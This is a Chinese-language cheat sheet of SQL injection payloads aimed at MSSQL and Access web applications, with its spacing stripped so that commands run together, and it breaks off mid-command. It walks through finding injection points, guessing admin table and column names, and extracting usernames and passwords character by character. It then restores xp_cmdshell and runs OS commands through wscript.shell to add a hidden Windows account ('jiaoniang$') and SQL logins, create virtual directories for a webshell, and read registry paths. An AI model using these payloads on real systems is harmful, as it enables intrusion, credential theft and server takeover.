渗透常用SQL注入语句大全

1.判断有无注入点;and1=1and1=22.猜表一般的表的名称无非是adminadminuseruserpasspassword等..and0(selectcount(*)from*)and0(selectcount(*)fromadmin)—判断是否存在admin这张表3.猜帐号数目如果遇到0返回正确页面1返回错误页面说明帐号数目就是1个and0(selectcount(*)fromadmin)and1(selectcount(*)fromadmin)4.猜解字段名称在len()括号里面加上我们想到的字段名称.?123and1=(selectcount(*)fromadminwherelen(*)0)–and1=(selectcount(*)fromadminwherelen(用户字段名称name)0)and1=(selectcount(*)fromadminwherelen(_blank密码字段名称password)0)5.猜解各个字段的长度猜解长度就是把0变换直到返回正确页面为止?12345678and1=(selectcount(*)fromadminwherelen(*)0)and1=(selectcount(*)fromadminwherelen(name)6)错误and1=(selectcount(*)fromadminwherelen(name)5)正确长度是6and1=(selectcount(*)fromadminwherelen(name)=6)正确and1=(selectcount(*)fromadminwherelen(password)11)正确and1=(selectcount(*)fromadminwherelen(password)12)错误长度是12and1=(selectcount(*)fromadminwherelen(password)=12)正确6.猜解字符and1=(selectcount(*)fromadminwhereleft(name,1)=a)—猜解用户帐号的第一位and1=(selectcount(*)fromadminwhereleft(name,2)=ab)—猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and1=(selecttop1count(*)fromAdminwhereAsc(mid(pass,5,1))=51)–这个查询语句可以猜解中文的用户和_blank密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.?1groupbyusers.idhaving1=1–=1–;insertintousersvalues(666,attacker,foobar,0xffff)–UNIONSelectTOP1COLUMN_blank_NAMEFROMINFORMATION_blank_SCHEMA.COLUMNSWhereTABLE_blank_NAME=logintable-UNIONSelectTOP1COLUMN_blank_NAMEFROMINFORMATION_blank_SCHEMA.COLUMNSWhereTABLE_blank_NAME=logintableWhereCOLUMN_blank_NAMENOTIN(login_blank_id)-UNIONSelectTOP1COLUMN_blank_NAMEFROMINFORMATION_blank_SCHEMA.COLUMNSWhereTABLE_blank_NAME=logintableWhereCOLUMN_blank_NAMENOTIN(login_blank_id,login_blank_name)-UNIONSelectTOP1login_blank_nameFROMlogintable-UNIONSelectTOP1passwordFROMlogintablewherelogin_blank_name=Rahul–看_blank服务器打的补丁=出错了打了SP4补丁and1=(select@@VERSION)–看_blank数据库连接账号的权限，返回正常，证明是_blank服务器角色sysadmin权限。and1=(SelectIS_blank_SRVROLEMEMBER(sysadmin))–判断连接_blank数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）?123andsa=(SelectSystem_blank_user)–anduser_blank_name()=dbo–and0(selectuser_blank_name()–看xp_blank_cmdshell是否删除and1=(Selectcount(*)FROMmaster.dbo.sysobjectsWherextype=XANDname=xp_blank_cmdshell)–xp_blank_cmdshell被删除，恢复,支持绝对路径的恢复;EXECmaster.dbo.sp_blank_addextendedprocxp_blank_cmdshell,xplog70.dll–;EXECmaster.dbo.sp_blank_addextendedprocxp_blank_cmdshell,c:\inetpub\–反向PING自己实验;usemaster;declare@sint;execsp_blank_oacreate“wscript.shell”,@sout;execsp_blank_oamethod@s,”run”,NULL,”cmd.exe/cping192.168.0.1″;–加帐号;DECLARE@shellINTEXECSP_blank_OACreatewscript.shell,@shellOUTPUTEXECSP_blank_OAMETHOD@shell,run,null,C:\WINNT\system32\cmd.exe/cnetuserjiaoniang$1866574/add–创建一个虚拟目录E盘：;declare@ointexecsp_blank_oacreatewscript.shell,@ooutexecsp_blank_oamethod@o,run,NULL,cscript.exec：\inetpub\“默认Web站点”-v“e”,”e：\”–访问属性：（配合写入一个webshell）declare@ointexecsp_blank_oacreatewscript.shell,@ooutexecsp_blank_oamethod@o,run,NULL,cscript.exec：\inetpub\爆库特殊_blank技巧：:%5c=\或者把/和\修改%5提交and0(selecttop1pathsfromnewtable)–得到库名（从1到5都是系统的id，6以上才可以判断）and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)–and0(selectcount(*)frommaster.dbo.sysdatabaseswherename1anddbid=6)依次提交dbid=7,8,9….得到更多的_blank数据库名?123456789and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)暴到一个表假设为adminand0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Admin))来得到其他的表。and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid(str(id)))暴到UID的数值假设为18779569uid=idand0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569)得到一个admin的一个字段,假设为user_blank_idand0(selecttop1namefrombbs.dbo.syscolumnswhereid=18779569andnamenotin(id,…))来暴出其他的字段and0(selectuser_blank_idfromBBS.dbo.adminwhereusername1)可以得到用户名依次可以得到_blank密码。。。。。假设存在user_blank_idusername,password等字段?12345678and0(selectcount(*)frommaster.dbo.sysdatabaseswherename1anddbid=6)and0(selecttop1namefrombbs.dbo.sysobjectswherextype=U)得到表名and0(selecttop1namefrombbs.dbo.sysobjectswherextype=Uandnamenotin(Address))and0(selectcount(*)frombbs.dbo.sysobjectswherextype=Uandname=adminanduid(str(id)))判断id值and0(selecttop1namefromBBS.dbo.syscolumnswhereid=773577794)所有字段?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin(union，access也好用)得到WEB路径?12345;createtable[dbo].[swap]([swappass][char](255));–and(selecttop1swappassfromswap)=1–;CreateTABLEnewtable(idintIDENTITY(1,1),pathsvarchar(500))Declare@testvarchar(20)execmaster..xp_blank_regread@rootkey=HKEY_blank_LOCAL_blank_MACHINE,@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\,@value_blank_name=/,values=@testOUTPUTinsertintopaths(path)values(@test)–;useku1;–;createtablecmd(strimage);–建立image类型的表cmd存在xp_blank_cmdshell的测试过程：?1234567891011;execmaster..xp_blank_cmdshelldir;execmaster.dbo.sp_blank_addloginjiaoniang$;–加SQL帐号;execmaster.dbo.sp_blank_passwordnull,jiaoniang$,1866574;–;exe